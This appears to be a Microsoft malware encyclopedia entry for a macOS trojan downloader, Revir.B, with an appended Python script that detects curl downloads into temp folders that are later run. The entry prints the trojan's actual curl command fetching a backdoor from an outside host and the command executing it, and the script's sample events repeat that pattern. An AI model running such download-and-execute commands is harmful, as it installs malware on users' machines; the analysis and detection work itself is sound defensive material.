TrojanDownloader:MacOS_X/Revir.B
First posted on 31 January 2013.
Source: Microsoft
Aliases:
There are no other names known for TrojanDownloader:MacOS_X/Revir.B.
Explanation:
TrojanDownloader:MacOS_X/Revir.B may arrive on your computer as an attachment or link within an email that is sent to you. The attachment or link may appear to be a legitimate PDF or JPG file.
When you open the attachment or click the link, the trojan will run.
Installation
TrojanDownloader:MacOS_X/Revir.B drops an image (JPG) file in the temporary folder ("~/tmp").
The trojan opens the JPG file in an attempt to hide its malicious behavior from you.
Payload
When opened, TrojanDownloader:MacOS_X/Revir.B runs from the following location:
~/tmp/host
The downloader connects to a server and downloads other malware, such as Backdoor:MacOS_X/Imuler.A, by using the following command:
curl -o /tmp/updtdata http://tarmu.narod.ru /<removed>
The trojan runs the downloaded file by using the following command:
/tmp/updtdata
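Detection logic for the download-then-run sequence described above, added here as an example and not part of the Microsoft entry. It generalizes from the single /tmp/updtdata path to any file that curl writes into a temporary directory and that is later executed; the event format, function names and example.invalid hosts are assumptions constructed for illustration.

```python
import os
import shlex

# Constructed process-execution events (time, pid, command line); not real telemetry.
# /tmp/updtdata is the path from this entry; hosts and other paths are placeholders.
SAMPLE_EVENTS = [
    ("10:00:01", 410, "open /Users/alice/tmp/photo.jpg"),
    ("10:00:02", 411, "curl -o /tmp/updtdata http://example.invalid/x"),
    ("10:00:05", 412, "/tmp/updtdata"),
    ("10:01:00", 413, "curl -o /Users/alice/Downloads/a.pdf http://example.invalid/a.pdf"),
    ("10:02:00", 414, "curl --output /private/tmp/notes.txt http://example.invalid/n"),
]
TEMP_PREFIXES = ("/tmp/", "/var/tmp/")

def norm(path):
    """On macOS /tmp is a symlink to /private/tmp; compare both as /tmp."""
    return path[len("/private"):] if path.startswith("/private/tmp/") else path

def curl_output_path(argv):
    """Return the file curl was told to write (-o FILE, -oFILE, --output FILE), or None."""
    if os.path.basename(argv[0]) != "curl":
        return None
    for i, arg in enumerate(argv[1:], start=1):
        if arg in ("-o", "--output") and i + 1 < len(argv):
            return argv[i + 1]
        if arg.startswith("-o") and len(arg) > 2:
            return arg[2:]
    return None

def find_download_then_execute(events):
    """Flag temp-directory files fetched by curl that are later run as a program."""
    fetched, alerts = {}, []   # fetched: normalized path -> downloading event
    for event in events:
        argv = shlex.split(event[2])
        if not argv:
            continue
        out = curl_output_path(argv)
        if out is not None:
            out = norm(out)
            if out.startswith(TEMP_PREFIXES):
                fetched[out] = event
            continue
        exe = norm(argv[0])
        if exe in fetched:
            alerts.append({"path": exe, "download": fetched[exe], "exec": event})
    return alerts

if __name__ == "__main__":
    for alert in find_download_then_execute(SAMPLE_EVENTS):
        print(alert)
```

Only the curl download followed by execution of the same temp path is reported; the downloads to a user folder and the temp file that is never run are not.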
Related encyclopedia entries
Backdoor:MacOS_X/Imuler.A
Analysis by Methusela Cebrian Ferrer
Last update 31 January 2013